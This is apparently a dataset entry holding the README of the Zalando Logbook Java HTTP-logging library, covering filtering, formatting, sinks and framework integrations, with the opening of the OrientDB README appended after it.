import static org.zalando.logbook.core.QueryFilters.accessToken;
import static org.zalando.logbook.core.QueryFilters.replaceQuery;

Logbook logbook = Logbook.builder()
    .requestFilter(RequestFilters.replaceBody(message -> contentType("audio/*").test(message) ? "mmh mmh mmh mmh" : null))
    .responseFilter(ResponseFilters.replaceBody(message -> contentType("*/*-stream").test(message) ? "It just keeps going and going..." : null))
    .queryFilter(accessToken())
    .queryFilter(replaceQuery("password", "<secret>"))
    .headerFilter(authorization())
    .headerFilter(eachHeader("X-Secret"::equalsIgnoreCase, "<secret>"))
    .build();
```

You can configure as many filters as you want - they will run consecutively.

##### JsonPath body filtering (experimental)

You can apply [JSON Path](https://github.com/json-path/JsonPath) filtering to JSON bodies.
-Here are some examples: - -```java -import static org.zalando.logbook.json.JsonPathBodyFilters.jsonPath; -import static java.util.regex.Pattern.compile; - -Logbook logbook = Logbook.builder() - .bodyFilter(jsonPath(""$.password"").delete()) - .bodyFilter(jsonPath(""$.active"").replace(""unknown"")) - .bodyFilter(jsonPath(""$.address"").replace(""X"")) - .bodyFilter(jsonPath(""$.name"").replace(compile(""^(\\w).+""), ""$1."")) - .bodyFilter(jsonPath(""$.friends.*.name"").replace(compile(""^(\\w).+""), ""$1."")) - .bodyFilter(jsonPath(""$.grades.*"").replace(1.0)) - .build(); -``` - -Take a look at the following example, before and after filtering was applied: - -
- Before - -```json -{ - ""id"": 1, - ""name"": ""Alice"", - ""password"": ""s3cr3t"", - ""active"": true, - ""address"": ""Anhalter Straße 17 13, 67278 Bockenheim an der Weinstraße"", - ""friends"": [ - { - ""id"": 2, - ""name"": ""Bob"" - }, - { - ""id"": 3, - ""name"": ""Charlie"" - } - ], - ""grades"": { - ""Math"": 1.0, - ""English"": 2.2, - ""Science"": 1.9, - ""PE"": 4.0 - } -} -``` -
- -
- After - -```json -{ - ""id"": 1, - ""name"": ""Alice"", - ""active"": ""unknown"", - ""address"": ""XXX"", - ""friends"": [ - { - ""id"": 2, - ""name"": ""B."" - }, - { - ""id"": 3, - ""name"": ""C."" - } - ], - ""grades"": { - ""Math"": 1.0, - ""English"": 1.0, - ""Science"": 1.0, - ""PE"": 1.0 - } -} -``` -
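
If neither the default filters nor JsonPath expressions fit, a custom `BodyFilter` can be supplied as a lambda on the builder. The sketch below is illustrative, not part of Logbook: the `CardMaskingFilter` class, the credit-card regex and the `XXXX` replacement are assumptions for this example. The masking logic itself is plain `java.util.regex`; the comment shows where it would plug into the builder.

```java
import java.util.regex.Pattern;

// Hypothetical body filter that masks long digit runs (e.g. card numbers).
// With Logbook on the classpath it could be registered roughly like:
//   Logbook.builder().bodyFilter((contentType, body) -> maskCards(body)).build();
public class CardMaskingFilter {

    // 13 to 16 consecutive digits, delimited by word boundaries
    private static final Pattern CARD = Pattern.compile("\\b\\d{13,16}\\b");

    static String maskCards(String body) {
        if (body == null) {
            return null;
        }
        // replace every match with a fixed placeholder
        return CARD.matcher(body).replaceAll("XXXX");
    }

    public static void main(String[] args) {
        System.out.println(maskCards("{\"card\":\"4111111111111111\",\"name\":\"Alice\"}"));
    }
}
```

Shorter digit runs (e.g. a four-digit PIN) are left untouched by the word-boundary anchors, so only card-length numbers are masked.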
-
-#### Correlation
-
-Logbook uses a *correlation id* to correlate requests and responses. This makes it possible to match related requests and responses that would usually be located in different places in the log file.
-
-If the default implementation of the correlation id is insufficient for your use case, you may provide a custom implementation:
-
-```java
-Logbook logbook = Logbook.builder()
-    .correlationId(new CustomCorrelationId())
-    .build();
-```
-
-#### Formatting
-
-*Formatting* defines how requests and responses are transformed into strings. Formatters do **not** specify where requests and responses are logged to — writers do that work.
-
-Logbook comes with two different default formatters: *HTTP* and *JSON*.
-
-##### HTTP
-
-*HTTP* is the default formatting style, provided by the `DefaultHttpLogFormatter`. It is primarily designed to be used for local development and debugging, not for production use. This is because it’s
-not as readily machine-readable as JSON.
-
-###### Request
-
-```http
-Incoming Request: 2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b
-GET http://example.org/test HTTP/1.1
-Accept: application/json
-Host: localhost
-Content-Type: text/plain
-
-Hello world!
-```
-
-###### Response
-
-```http
-Outgoing Response: 2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b
-Duration: 25 ms
-HTTP/1.1 200
-Content-Type: application/json
-
-{""value"":""Hello world!""}
-```
-
-##### JSON
-
-*JSON* is an alternative formatting style, provided by the `JsonHttpLogFormatter`. Unlike HTTP, it is primarily designed for production use — parsers and log consumers can easily consume it.
-
-Requires the following dependency:
-
-```xml
-<dependency>
-    <groupId>org.zalando</groupId>
-    <artifactId>logbook-json</artifactId>
-</dependency>
-```
-
-###### Request
-
-```json
-{
-  ""origin"": ""remote"",
-  ""type"": ""request"",
-  ""correlation"": ""2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b"",
-  ""protocol"": ""HTTP/1.1"",
-  ""sender"": ""127.0.0.1"",
-  ""method"": ""GET"",
-  ""uri"": ""http://example.org/test"",
-  ""host"": ""example.org"",
-  ""path"": ""/test"",
-  ""scheme"": ""http"",
-  ""port"": null,
-  ""headers"": {
-    ""Accept"": [""application/json""],
-    ""Content-Type"": [""text/plain""]
-  },
-  ""body"": ""Hello world!""
-}
-```
-
-###### Response
-
-```json
-{
-  ""origin"": ""local"",
-  ""type"": ""response"",
-  ""correlation"": ""2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b"",
-  ""duration"": 25,
-  ""protocol"": ""HTTP/1.1"",
-  ""status"": 200,
-  ""headers"": {
-    ""Content-Type"": [""text/plain""]
-  },
-  ""body"": ""Hello world!""
-}
-```
-
-Note: Bodies of type `application/json` (and `application/*+json`) will be *inlined* into the resulting JSON tree. I.e.,
-a JSON response body will **not** be escaped and represented as a string:
-
-```json
-{
-  ""origin"": ""local"",
-  ""type"": ""response"",
-  ""correlation"": ""2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b"",
-  ""duration"": 25,
-  ""protocol"": ""HTTP/1.1"",
-  ""status"": 200,
-  ""headers"": {
-    ""Content-Type"": [""application/json""]
-  },
-  ""body"": {
-    ""greeting"": ""Hello, world!""
-  }
-}
-```
-
-##### Common Log Format
-
-The Common Log Format ([CLF](https://httpd.apache.org/docs/trunk/logs.html#common)) is a standardized text file format used by web servers when generating server log files.
The format is supported via
-the `CommonsLogFormatSink`:
-
-```text
-185.85.220.253 - - [02/Aug/2019:08:16:41 0000] ""GET /search?q=zalando HTTP/1.1"" 200 -
-```
-
-##### Extended Log Format
-
-The Extended Log Format ([ELF](https://en.wikipedia.org/wiki/Extended_Log_Format)) is a standardised text file format, like Common Log Format (CLF), that is used by web servers when generating log
-files, but ELF files provide more information and flexibility. The format is supported via the `ExtendedLogFormatSink`.
-See also the [W3C](https://www.w3.org/TR/WD-logfile.html) document.
-
-Default fields:
-
-```text
-date time c-ip s-dns cs-method cs-uri-stem cs-uri-query sc-status sc-bytes cs-bytes time-taken cs-protocol cs(User-Agent) cs(Cookie) cs(Referrer)
-```
-
-Default log output example:
-
-```text
-2019-08-02 08:16:41 185.85.220.253 localhost POST /search ?q=zalando 200 21 20 0.125 HTTP/1.1 ""Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0"" ""name=value"" ""https://example.com/page?q=123""
-```
-
-Users may override the default fields with custom fields through the constructor of `ExtendedLogFormatSink`:
-
-```java
-new ExtendedLogFormatSink(new DefaultHttpLogWriter(),""date time cs(Custom-Request-Header) sc(Custom-Response-Header)"")
-```
-
-For HTTP header fields, `cs(Any-Header)` and `sc(Any-Header)`, users can specify any headers they want to extract from the request.
-
-Other supported fields are listed in `ExtendedLogFormatSink.Field` and can be used in the custom field expression.
-
-##### cURL
-
-*cURL* is an alternative formatting style, provided by the `CurlHttpLogFormatter` which will render requests as
-executable [`cURL`](https://curl.haxx.se/) commands. Unlike JSON, it is primarily designed for humans.
-
-###### Request
-
-```bash
-curl -v -X GET 'http://localhost/test' -H 'Accept: application/json'
-```
-
-###### Response
-
-See [HTTP](#http) or provide your own fallback for responses:
-
-```java
-new CurlHttpLogFormatter(new JsonHttpLogFormatter());
-```
-
-##### Splunk
-
-*Splunk* is an alternative formatting style, provided by the `SplunkHttpLogFormatter` which will render
-requests and responses as key-value pairs.
-
-###### Request
-
-```text
-origin=remote type=request correlation=2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b protocol=HTTP/1.1 sender=127.0.0.1 method=POST uri=http://example.org/test host=example.org scheme=http port=null path=/test headers={Accept=[application/json], Content-Type=[text/plain]} body=Hello world!
-
-```
-
-###### Response
-
-```text
-origin=local type=response correlation=2d66e4bc-9a0d-11e5-a84c-1f39510f0d6b duration=25 protocol=HTTP/1.1 status=200 headers={Content-Type=[text/plain]} body=Hello world!
-```
-
-#### Writing
-
-Writing defines where formatted requests and responses are written to. Logbook comes with three implementations:
-Logger, Stream and Chunking.
-
-##### Logger
-
-By default, requests and responses are logged with an *slf4j* logger that uses the `org.zalando.logbook.Logbook`
-category and the log level `trace`. This can be customized:
-
-```java
-Logbook logbook = Logbook.builder()
-    .sink(new DefaultSink(
-        new DefaultHttpLogFormatter(),
-        new DefaultHttpLogWriter()
-    ))
-    .build();
-```
-
-##### Stream
-
-An alternative implementation is to log requests and responses to a `PrintStream`, e.g. `System.out` or `System.err`. This is usually a bad choice for running in production, but can sometimes be
-useful for short-term local development and/or investigation.
-
-```java
-Logbook logbook = Logbook.builder()
-    .sink(new DefaultSink(
-        new DefaultHttpLogFormatter(),
-        new StreamHttpLogWriter(System.err)
-    ))
-    .build();
-```
-
-##### Chunking
-
-The `ChunkingSink` will split long messages into smaller chunks and will write them individually while delegating to another sink:
-
-```java
-Logbook logbook = Logbook.builder()
-    .sink(new ChunkingSink(sink, 1000))
-    .build();
-
-```
-
-#### Sink
-
-The combination of `HttpLogFormatter` and `HttpLogWriter` suits most use cases well, but it has limitations.
-Implementing the `Sink` interface directly allows for more sophisticated use cases, e.g. writing requests/responses
-to a structured persistent storage like a database.
-
-Multiple sinks can be combined into one using the `CompositeSink`.
-
-### Servlet
-
-You’ll have to register the `LogbookFilter` as a `Filter` in your filter chain — either in your `web.xml` file (please note that the xml approach will use all the defaults and is not configurable):
-
-```xml
-<filter>
-    <filter-name>LogbookFilter</filter-name>
-    <filter-class>org.zalando.logbook.servlet.LogbookFilter</filter-class>
-</filter>
-<filter-mapping>
-    <filter-name>LogbookFilter</filter-name>
-    <url-pattern>/*</url-pattern>
-    <dispatcher>REQUEST</dispatcher>
-    <dispatcher>ASYNC</dispatcher>
-</filter-mapping>
-```
-
-or programmatically, via the `ServletContext`:
-
-```java
-context.addFilter(""LogbookFilter"", new LogbookFilter(logbook))
-    .addMappingForUrlPatterns(EnumSet.of(REQUEST, ASYNC), true, ""/*"");
-```
-
-**Beware**: The `ERROR` dispatch is not supported. You're strongly advised to produce error responses within the
-`REQUEST` or `ASYNC` dispatch.
-
-The `LogbookFilter` will, by default, treat requests with an `application/x-www-form-urlencoded` body no differently from
-any other request, i.e. you will see the request body in the logs. The downside of this approach is that you won't be
-able to use any of the `HttpServletRequest.getParameter*(..)` methods. See issue [#94](../../issues/94) for some more
-details.
- -#### Form Requests - -As of Logbook 1.5.0, you can now specify one of three strategies that define how Logbook deals with this situation by -using the `logbook.servlet.form-request` system property: - -| Value | Pros | Cons | -|------------------|-----------------------------------------------------------------------------------|----------------------------------------------------| -| `body` (default) | Body is logged | Downstream code can **not use `getParameter*()`** | -| `parameter` | Body is logged (but it's reconstructed from parameters) | Downstream code can **not use `getInputStream()`** | -| `off` | Downstream code can decide whether to use `getInputStream()` or `getParameter*()` | Body is **not logged** | - -#### Security - -Secure applications usually need a slightly different setup. You should generally avoid logging unauthorized requests, especially the body, because it quickly allows attackers to flood your logfile — -and, consequently, your precious disk space. Assuming that your application handles authorization inside another filter, you have two choices: - -- Don't log unauthorized requests -- Log unauthorized requests without the request body - -You can easily achieve the former setup by placing the `LogbookFilter` after your security filter. The latter is a little bit more sophisticated. You’ll need two `LogbookFilter` instances — one before -your security filter, and one after it: - -```java -context.addFilter(""SecureLogbookFilter"", new SecureLogbookFilter(logbook)) - .addMappingForUrlPatterns(EnumSet.of(REQUEST, ASYNC), true, ""/*""); -context.addFilter(""securityFilter"", new SecurityFilter()) - .addMappingForUrlPatterns(EnumSet.of(REQUEST), true, ""/*""); -context.addFilter(""LogbookFilter"", new LogbookFilter(logbook)) - .addMappingForUrlPatterns(EnumSet.of(REQUEST, ASYNC), true, ""/*""); -``` - -The first logbook filter will log unauthorized requests **only**. The second filter will log authorized requests, as always. 
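
The `logbook.servlet.form-request` strategy described above is an ordinary Java system property, so it can be selected programmatically before the servlet container starts. A minimal sketch (the `FormRequestConfig` class name is made up for this example; the property name and values come from the table above):

```java
// Select how Logbook's servlet filter handles form requests.
// Valid values per the table above: "body" (default), "parameter", "off".
public class FormRequestConfig {

    static void configure(String mode) {
        // must run before the LogbookFilter processes its first request
        System.setProperty("logbook.servlet.form-request", mode);
    }

    public static void main(String[] args) {
        configure("parameter");
        System.out.println(System.getProperty("logbook.servlet.form-request"));
    }
}
```

Equivalently, the property can be passed on the command line, e.g. `-Dlogbook.servlet.form-request=parameter`.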
-
-### HTTP Client
-
-The `logbook-httpclient` module contains both an `HttpRequestInterceptor` and an `HttpResponseInterceptor` to use with the `HttpClient`:
-
-```java
-CloseableHttpClient client = HttpClientBuilder.create()
-    .addInterceptorFirst(new LogbookHttpRequestInterceptor(logbook))
-    .addInterceptorFirst(new LogbookHttpResponseInterceptor())
-    .build();
-```
-
-Since the `LogbookHttpResponseInterceptor` is incompatible with the `HttpAsyncClient`, there is another way to log responses:
-
-```java
-CloseableHttpAsyncClient client = HttpAsyncClientBuilder.create()
-    .addInterceptorFirst(new LogbookHttpRequestInterceptor(logbook))
-    .build();
-
-// and then wrap your response consumer
-client.execute(producer, new LogbookHttpAsyncResponseConsumer<>(consumer), callback)
-```
-
-### HTTP Client 5
-
-The `logbook-httpclient5` module contains an `ExecHandler` to use with the `HttpClient`:
-```java
-CloseableHttpClient client = HttpClientBuilder.create()
-    .addExecInterceptorFirst(""Logbook"", new LogbookHttpExecHandler(logbook))
-    .build();
-```
-The Handler should be added first, such that compression is performed after logging and decompression is performed before logging.
-
-To avoid a breaking change, there is also an `HttpRequestInterceptor` and an `HttpResponseInterceptor` to use with the `HttpClient`, which work fine as long as compression (or other ExecHandlers) is
-not used:
-
-```java
-CloseableHttpClient client = HttpClientBuilder.create()
-    .addRequestInterceptorFirst(new LogbookHttpRequestInterceptor(logbook))
-    .addResponseInterceptorFirst(new LogbookHttpResponseInterceptor())
-    .build();
-```
-
-Since the `LogbookHttpResponseInterceptor` is incompatible with the `HttpAsyncClient`, there is another way to log responses:
-
-```java
-CloseableHttpAsyncClient client = HttpAsyncClientBuilder.create()
-    .addRequestInterceptorFirst(new LogbookHttpRequestInterceptor(logbook))
-    .build();
-
-// and then wrap your response consumer
-client.execute(producer, new LogbookHttpAsyncResponseConsumer<>(consumer), callback)
-```
-
-### JAX-RS 2.x and 3.x (aka Jakarta RESTful Web Services)
-
-> [!NOTE]
-> **Support for JAX-RS 2.x**
->
-> JAX-RS 2.x (legacy) support was dropped in Logbook 3.0 to 3.6.
->
-> As of Logbook 3.7, JAX-RS 2.x support is back.
->
-> However, you need to add the `javax` **classifier** to use the proper Logbook module:
->
-> ```xml
-> <dependency>
->     <groupId>org.zalando</groupId>
->     <artifactId>logbook-jaxrs</artifactId>
->     <version>${logbook.version}</version>
->     <classifier>javax</classifier>
-> </dependency>
-> ```
->
-> You should also make sure that the following dependencies are on your classpath.
-> By default, `logbook-jaxrs` imports `jersey-client 3.x`, which is not compatible with JAX-RS 2.x:
->
-> * [jersey-client 2.x](https://mvnrepository.com/artifact/org.glassfish.jersey.core/jersey-client/2.41)
-> * [jersey-hk2 2.x](https://mvnrepository.com/artifact/org.glassfish.jersey.inject/jersey-hk2/2.41)
-> * [javax.activation](https://mvnrepository.com/artifact/javax.activation/activation/1.1.1)
-
-The `logbook-jaxrs` module contains:
-
-A `LogbookClientFilter` to be used for applications making HTTP requests
-
-```java
-client.register(new LogbookClientFilter(logbook));
-```
-
-A `LogbookServerFilter` to be used with HTTP servers
-
-```java
-resourceConfig.register(new LogbookServerFilter(logbook));
-```
-
-### JDK HTTP Server
-
-The `logbook-jdkserver` module provides support for
-[JDK HTTP server](https://docs.oracle.com/javase/8/docs/jre/api/net/httpserver/spec/com/sun/net/httpserver/HttpServer.html)
-and contains:
-
-A `LogbookFilter` to be used with the builtin server
-
-```java
-httpServer.createContext(path,handler).getFilters().add(new LogbookFilter(logbook))
-```
-
-### Netty
-
-The `logbook-netty` module contains:
-
-A `LogbookClientHandler` to be used with an `HttpClient`:
-
-```java
-HttpClient httpClient =
-    HttpClient.create()
-        .doOnConnected(
-            (connection -> connection.addHandlerLast(new LogbookClientHandler(logbook)))
-        );
-```
-
-A `LogbookServerHandler` to be used with an `HttpServer`:
-
-```java
-HttpServer httpServer =
-    HttpServer.create()
-        .doOnConnection(
-            connection -> connection.addHandlerLast(new LogbookServerHandler(logbook))
-        );
-```
-
-#### Spring WebFlux
-
-Users of Spring WebFlux can pick any of the following options:
-
-- Programmatically create a `NettyWebServer` (passing an `HttpServer`)
-- Register a custom `NettyServerCustomizer`
-- Programmatically create a `ReactorClientHttpConnector` (passing an `HttpClient`)
-- Register a custom `WebClientCustomizer`
-- Use separate connector-independent module
`logbook-spring-webflux` - -#### Micronaut - -Users of Micronaut can follow the [official docs](https://docs.micronaut.io/snapshot/guide/index.html#nettyClientPipeline) on how to integrate Logbook with Micronaut. - -:warning: Even though Quarkus and Vert.x use Netty under the hood, unfortunately neither of them allows accessing or customizing it (yet). - -### OkHttp v2.x - -The `logbook-okhttp2` module contains an `Interceptor` to use with version 2.x of the `OkHttpClient`: - -```java -OkHttpClient client = new OkHttpClient(); -client.networkInterceptors().add(new LogbookInterceptor(logbook)); -``` - -If you're expecting gzip-compressed responses you need to register our `GzipInterceptor` in addition. -The transparent gzip support built into OkHttp will run after any network interceptor which forces -logbook to log compressed binary responses. - -```java -OkHttpClient client = new OkHttpClient(); -client.networkInterceptors().add(new LogbookInterceptor(logbook)); -client.networkInterceptors().add(new GzipInterceptor()); -``` - -### OkHttp v3.x - -The `logbook-okhttp` module contains an `Interceptor` to use with version 3.x of the `OkHttpClient`: - -```java -OkHttpClient client = new OkHttpClient.Builder() - .addNetworkInterceptor(new LogbookInterceptor(logbook)) - .build(); -``` - -If you're expecting gzip-compressed responses you need to register our `GzipInterceptor` in addition. -The transparent gzip support built into OkHttp will run after any network interceptor which forces -logbook to log compressed binary responses. 
-
-```java
-OkHttpClient client = new OkHttpClient.Builder()
-    .addNetworkInterceptor(new LogbookInterceptor(logbook))
-    .addNetworkInterceptor(new GzipInterceptor())
-    .build();
-```
-
-### Ktor
-
-The `logbook-ktor-client` module contains:
-
-A `LogbookClient` to be used with an `HttpClient`:
-
-```kotlin
-private val client = HttpClient(CIO) {
-    install(LogbookClient) {
-        logbook = logbook
-    }
-}
-```
-
-The `logbook-ktor-server` module contains:
-
-A `LogbookServer` to be used with an `Application`:
-
-```kotlin
-private val server = embeddedServer(CIO) {
-    install(LogbookServer) {
-        logbook = logbook
-    }
-}
-```
-
-Alternatively, you can use `logbook-ktor`, which ships both `logbook-ktor-client` and `logbook-ktor-server` modules.
-
-### Spring
-The `logbook-spring` module contains a `ClientHttpRequestInterceptor` to use with `RestTemplate`:
-
-```java
-LogbookClientHttpRequestInterceptor interceptor = new LogbookClientHttpRequestInterceptor(logbook);
-RestTemplate restTemplate = new RestTemplate();
-restTemplate.getInterceptors().add(interceptor);
-```
-
-### Spring Boot Starter
-
-Logbook comes with a convenient auto configuration for Spring Boot users. It sets up all of the following parts automatically with sensible defaults:
-
-- Servlet filter
-- Second Servlet filter for unauthorized requests (if Spring Security is detected)
-- Header-/Parameter-/Body-Filters
-- HTTP-/JSON-style formatter
-- Logging writer
-
-Instead of declaring a dependency on `logbook-core`, declare one on the Spring Boot Starter:
-
-```xml
-<dependency>
-    <groupId>org.zalando</groupId>
-    <artifactId>logbook-spring-boot-starter</artifactId>
-    <version>${logbook.version}</version>
-</dependency>
-```
-
-Every bean can be overridden and customized if needed, e.g.
like this:
-
-```java
-@Bean
-public BodyFilter bodyFilter() {
-    return merge(
-            defaultValue(),
-            replaceJsonStringProperty(singleton(""secret""), ""XXX""));
-}
-```
-
-Please refer to [`LogbookAutoConfiguration`](logbook-spring-boot-autoconfigure/src/main/java/org/zalando/logbook/autoconfigure/LogbookAutoConfiguration.java)
-or the following table to see a list of possible integration points:
-
-| Type                     | Name                  | Default                                                                                       |
-|--------------------------|-----------------------|-----------------------------------------------------------------------------------------------|
-| `FilterRegistrationBean` | `secureLogbookFilter` | Based on `LogbookFilter`                                                                      |
-| `FilterRegistrationBean` | `logbookFilter`       | Based on `LogbookFilter`                                                                      |
-| `Logbook`                |                       | Based on condition, filters, formatter and writer                                             |
-| `Predicate`              | `requestCondition`    | No filter; is later combined with `logbook.predicate.include` and `logbook.predicate.exclude` |
-| `HeaderFilter`           |                       | Based on `logbook.obfuscate.headers`                                                          |
-| `PathFilter`             |                       | Based on `logbook.obfuscate.paths`                                                            |
-| `QueryFilter`            |                       | Based on `logbook.obfuscate.parameters`                                                       |
-| `BodyFilter`             |                       | `BodyFilters.defaultValue()`, see [filtering](#filtering)                                     |
-| `RequestFilter`          |                       | `RequestFilters.defaultValue()`, see [filtering](#filtering)                                  |
-| `ResponseFilter`         |                       | `ResponseFilters.defaultValue()`, see [filtering](#filtering)                                 |
-| `Strategy`               |                       | `DefaultStrategy`                                                                             |
-| `AttributeExtractor`     |                       | `NoOpAttributeExtractor`                                                                      |
-| `Sink`                   |                       | `DefaultSink`                                                                                 |
-| `HttpLogFormatter`       |                       | `JsonHttpLogFormatter`                                                                        |
-| `HttpLogWriter`          |                       | `DefaultHttpLogWriter`                                                                        |
-
-Multiple filters are merged into one.
-
-#### Autoconfigured beans from `logbook-spring`
-Some classes from `logbook-spring` are included in the auto configuration.
-
-You can autowire `LogbookClientHttpRequestInterceptor` with code like:
-```java
-private final RestTemplate restTemplate;
-MyClient(RestTemplateBuilder builder, LogbookClientHttpRequestInterceptor interceptor){
-    this.restTemplate = builder
-            .additionalInterceptors(interceptor)
-            .build();
-}
-```
-
-#### Configuration
-
-The following table shows the available configuration (sorted alphabetically):
-
-| Configuration | Description | Default |
-|---------------|-------------|---------|
-| `logbook.attribute-extractors` | List of [AttributeExtractor](#attribute-extractor)s, including configurations such as `type` (currently `JwtFirstMatchingClaimExtractor` or `JwtAllMatchingClaimsExtractor`), `claim-names` and `claim-key`. | `[]` |
-| `logbook.filter.enabled` | Enable the [`LogbookFilter`](#servlet) | `true` |
-| `logbook.filter.form-request-mode` | Determines how [form requests](#form-requests) are handled | `body` |
-| `logbook.filters.body.default-enabled` | Enables/disables default body filters that are collected by java.util.ServiceLoader | `true` |
-| `logbook.format.style` | [Formatting style](#formatting) (`http`, `json`, `curl` or `splunk`) | `json` |
-| `logbook.httpclient.decompress-response` | Enables/disables additional decompression process for HttpClient with gzip encoded body (for logging purposes only). This means extra decompression and possible performance impact. | `false` (disabled) |
-| `logbook.minimum-status` | Minimum status to enable logging (`status-at-least` and `body-only-if-status-at-least`) | `400` |
-| `logbook.obfuscate.headers` | List of header names that need obfuscation | `[Authorization]` |
-| `logbook.obfuscate.json-body-fields` | List of JSON body fields to be obfuscated | `[]` |
-| `logbook.obfuscate.parameters` | List of parameter names that need obfuscation | `[access_token]` |
-| `logbook.obfuscate.paths` | List of paths that need obfuscation. Check [Filtering](#filtering) for syntax. | `[]` |
-| `logbook.obfuscate.replacement` | A value to be used instead of an obfuscated one | `XXX` |
-| `logbook.predicate.include` | Include only certain paths and methods (if defined) | `[]` |
-| `logbook.predicate.exclude` | Exclude certain paths and methods (overrides `logbook.predicate.include`) | `[]` |
-| `logbook.secure-filter.enabled` | Enable the [`SecureLogbookFilter`](#servlet) | `true` |
-| `logbook.strategy` | [Strategy](#strategy) (`default`, `status-at-least`, `body-only-if-status-at-least`, `without-body`) | `default` |
-| `logbook.write.chunk-size` | Splits log lines into smaller chunks of size up-to `chunk-size`. | `0` (disabled) |
-| `logbook.write.max-body-size` | Truncates the body up to `max-body-size` and appends `...`.<br>:warning: Logbook will still buffer the full body, if the request is eligible for logging, regardless of the `logbook.write.max-body-size` value | `-1` (disabled) |
-
-##### Example configuration
-
-```yaml
-logbook:
-  predicate:
-    include:
-      - path: /api/**
-        methods:
-          - GET
-          - POST
-      - path: /actuator/**
-    exclude:
-      - path: /actuator/health
-      - path: /api/admin/**
-        methods:
-          - POST
-  filter.enabled: true
-  secure-filter.enabled: true
-  format.style: http
-  strategy: body-only-if-status-at-least
-  minimum-status: 400
-  obfuscate:
-    headers:
-      - Authorization
-      - X-Secret
-    parameters:
-      - access_token
-      - password
-  write:
-    chunk-size: 1000
-  attribute-extractors:
-    - type: JwtFirstMatchingClaimExtractor
-      claim-names: [ ""sub"", ""subject"" ]
-      claim-key: Principal
-    - type: JwtAllMatchingClaimsExtractor
-      claim-names: [ ""sub"", ""iat"" ]
-```
-
-### logstash-logback-encoder
-
-For a basic Logback configuration, e.g. a `ConsoleAppender` using the `LogstashEncoder`:
-
-```
-<configuration>
-    <appender name=""stdout"" class=""ch.qos.logback.core.ConsoleAppender"">
-        <encoder class=""net.logstash.logback.encoder.LogstashEncoder""/>
-    </appender>
-    <root level=""TRACE"">
-        <appender-ref ref=""stdout""/>
-    </root>
-</configuration>
-```
-
-configure Logbook with a `LogstashLogbackSink`
-
-```
-HttpLogFormatter formatter = new JsonHttpLogFormatter();
-LogstashLogbackSink sink = new LogstashLogbackSink(formatter);
-```
-
-for output like
-
-```
-{
-  ""@timestamp"" : ""2019-03-08T09:37:46.239+01:00"",
-  ""@version"" : ""1"",
-  ""message"" : ""GET http://localhost/test?limit=1"",
-  ""logger_name"" : ""org.zalando.logbook.Logbook"",
-  ""thread_name"" : ""main"",
-  ""level"" : ""TRACE"",
-  ""level_value"" : 5000,
-  ""http"" : {
-    // logbook request/response contents
-  }
-}
-```
-
-#### Customizing default Logging Level
-
-You can customize the default logging level by initializing `LogstashLogbackSink` with a specific level. For instance:
-
-```
-LogstashLogbackSink sink = new LogstashLogbackSink(formatter, Level.INFO);
-```
-
-## Known Issues
-
-1. The Logbook Servlet Filter interferes with downstream code using `getWriter` and/or `getParameter*()`. See [Servlet](#servlet) for more details.
-2.
The Logbook Servlet Filter does **NOT** support `ERROR` dispatch. You're strongly encouraged to not use it to produce error responses. - -## Getting Help with Logbook - -If you have questions, concerns, bug reports, etc., please file an issue in this repository's [Issue Tracker](https://github.com/zalando/logbook/issues). - -## Getting Involved/Contributing - -To contribute, simply make a pull request and add a brief description (1-2 sentences) of your addition or change. For -more details, check the [contribution guidelines](.github/CONTRIBUTING.md). - -## Alternatives - -- [Apache HttpClient Wire Logging](http://hc.apache.org/httpcomponents-client-4.5.x/logging.html) - - Client-side only - - Apache HttpClient exclusive - - Support for HTTP bodies -- [Spring Boot Access Logging](http://docs.spring.io/spring-boot/docs/current/reference/htmlsingle/#howto-configure-accesslogs) - - Spring application only - - Server-side only - - Tomcat/Undertow/Jetty exclusive - - **No** support for HTTP bodies -- [Tomcat Request Dumper Filter](https://tomcat.apache.org/tomcat-7.0-doc/config/filter.html#Request_Dumper_Filter) - - Server-side only - - Tomcat exclusive - - **No** support for HTTP bodies -- [logback-access](http://logback.qos.ch/access.html) - - Server-side only - - Any servlet container - - Support for HTTP bodies - -## Credits and References - -![Creative Commons (Attribution-Share Alike 3.0 Unported](https://licensebuttons.net/l/by-sa/3.0/80x15.png) -[*Grand Turk, a replica of a three-masted 6th rate frigate from Nelson's days - logbook and charts*](https://commons.wikimedia.org/wiki/File:Grand_Turk(34).jpg) -by [JoJan](https://commons.wikimedia.org/wiki/User:JoJan) is licensed under a -[Creative Commons (Attribution-Share Alike 3.0 Unported)](http://creativecommons.org/licenses/by-sa/3.0/). -",0 -orientechnologies/orientdb,"OrientDB is the most versatile DBMS supporting Graph, Document, Reactive, Full-Text and Geospatial models in one Multi-Model product. 
OrientDB can run distributed (Multi-Master), supports SQL, ACID Transactions, Full-Text indexing and Reactive Queries.",2012-12-09T20:33:47Z,,"## OrientDB
-
-[![License](https://img.shields.io/badge/License-Apache%202.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)
-[![REUSE status](https://api.reuse.software/badge/github.com/orientechnologies/orientdb)](https://api.reuse.software/info/github.com/orientechnologies/orientdb)
-
-------
-
-## What is OrientDB?
-
-**OrientDB** is an Open Source Multi-Model [NoSQL](http://en.wikipedia.org/wiki/NoSQL) DBMS with support for Native Graphs, Documents,
-Full-Text search, Reactivity, Geo-Spatial and Object Oriented concepts. It's written in Java and it's amazingly fast.
-No expensive run-time JOINs: connections are managed as persistent pointers between records.
-You can traverse thousands of records in no time. Supports schema-less, schema-full and schema-mixed modes.
-Has a strong security profiling system based on users, roles and predicate security and supports [SQL](https://orientdb.org/docs/3.1.x/sql/) amongst the query languages.
-Thanks to the [SQL](https://orientdb.org/docs/3.1.x/sql/) layer it's straightforward to use for people skilled in the Relational world.
-
-[Get started with OrientDB](http://orientdb.org/docs/3.2.x/gettingstarted/) |
-[OrientDB Community Group](https://github.com/orientechnologies/orientdb/discussions) |
-[Dev Updates](https://fosstodon.org/@orientdb) |
-[Community Chat](https://matrix.to/#/#orientdb-community:matrix.org).
-
-## Is OrientDB a Relational DBMS?
-
-No. OrientDB adheres to the [NoSQL](http://en.wikipedia.org/wiki/NoSQL) movement even though it supports [ACID Transactions](https://orientdb.org/docs/3.2.x/internals/Transactions.html) and
